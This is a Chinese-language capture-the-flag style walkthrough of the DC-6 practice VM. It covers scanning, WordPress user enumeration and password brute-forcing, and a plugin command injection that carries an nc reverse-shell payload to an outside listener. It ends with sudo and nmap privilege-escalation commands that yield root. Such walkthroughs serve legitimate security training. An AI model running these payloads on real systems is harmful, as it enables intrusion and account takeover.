2022渗透测试-一次完整的渗透测试(DC-6靶场)

简介: 2022渗透测试-一次完整的渗透测试(DC-6靶场)

 DC靶场的下载、安装与访问在上一篇的文章中。

网络异常,图片无法展示
|

靶场攻略:

1、使用nmap快速扫描的命令:

nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24

image.gif

识别到靶场主机ip

image.gif编辑

2.使用命令:

nmap -A -p- -T4 192.168.120.138

image.gif

探测靶场突破口,探测到开放了80端口-http服务,22端口-ssh服务。image.gif编辑

3.访问80端口,寻找进一步突破口。如果直接使用ip访问会跳转到http://wordy/,而无法正常加载出来。所以需要我们去添加hosts文件,跳转域名来访问靶场ip。

Windows:可以访问本地hosts,打开C:\Windows\System32\drivers\etc,修改hosts文件。

image.gif编辑

Linux:在/etc/hosts文件中添加域名。

打开浏览器,访问即可。

image.gif编辑 4.如图,可以得知网页用wordpress搭建,可以尝试wpscan进行扫描获得网站用户名。

image.gif编辑

wpscan --url wordy -e u

image.gif

image.gif编辑

扫出了五个用户,将五个用户保存在一个文件user.txt里,如图所示。

image.gif编辑

靶机作者的提示

image.gif编辑

使用提示的命令生成一个字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image.gif

使用wpscan进行爆破

wpscan --url wordy -U user.txt -P passwords.txt

image.gif

image.gif编辑

爆破出一组密码mark/helpdesk01。

image.gif编辑

6.使用dirb进行网站目录扫描

dirb http://wordy  /usr/share/wordlists/dirb/big.txt

image.gif

扫描出登陆页面

http://wordy/wp-admin/

image.gif

image.gif编辑

7.用刚刚爆破出来的账号密码进行登录。

image.gif编辑

在插件中,找到一个存在漏洞的插件Activity monitor

image.gif编辑

根据漏扫说明,在插件的tools界面,存在命令执行漏洞,可以利用进行反弹shell

image.gif编辑

使用BP进行抓包,在ip参数后加入要执行的命令,成功执行。

image.gif编辑

kali使用命令:nc -lvvp 1234开始监听。

brup修改参数 127.0.0.1 | nc -e /bin/bash 192.168.120.129 1234

image.gif编辑

成功接收到反弹的shell。

输入命令:python -c "import pty;pty.spawn('/bin/bash')",得到一个交互shell。

image.gif编辑

使用命令:ls -alhR /home,列出/home目录下的所有文件,发现几个隐私文件

image.gif编辑

在things-to-do.txt文件中,我们看到了账号和密码。

image.gif编辑

通过ssh进行登录,成功登录。

image.gif编辑

使用命令:sudo -l

image.gif编辑

我们发现graham可以用jens的身份执行 /home/jens/backups.sh,把 /bin/bash追加到这个文件,然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell

cd /home/jens
echo '/bin/bash' >> backups.sh
sudo -u jens ./backups.sh

image.gif

执行 sudo -l查看一下有没有可以提权的命令。

image.gif编辑

发现可以用root权限执行nmap,nmap在早期版本是可以用来提权的,我们来尝试一下nmap提权。将提权代码 os.execute("/bin/sh")写入一个文件中。

echo 'os.execute("/bin/sh")' > rootshell.nse

image.gif

然后以root的权限用nmap执行这个脚本:

sudo nmap --script=rootshell.nse

image.gif

现在就已经提权成功了,可以读取最后的flag了。

cd /root
cat theflag.txt

image.gif

image.gif编辑

相关文章
|
2月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
34 4
|
2月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
43 4
|
2月前
|
安全 程序员 网络安全
Kali渗透测试:对软件的溢出漏洞进行测试
Kali渗透测试:对软件的溢出漏洞进行测试
41 1
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
47 0
|
3月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
48 0
|
6月前
|
存储 安全 测试技术
渗透测试之白盒测试:一种深入的安全性评估方法
渗透测试中的白盒测试是一种利用系统详细信息(如源代码、数据库结构和网络拓扑)进行深度安全评估的方法。通过源代码审查、数据库分析和网络拓扑研究,测试人员能更准确地发现漏洞并提高测试效率。尽管白盒测试能深入揭露潜在威胁,但也面临信息获取难、代码理解复杂及对测试人员高技能要求的挑战。
渗透测试之白盒测试:一种深入的安全性评估方法
|
7月前
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
|
7月前
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA  AC/DC电源模块的可靠性设计与测试方法
|
7月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
189 0
|
7月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
146 0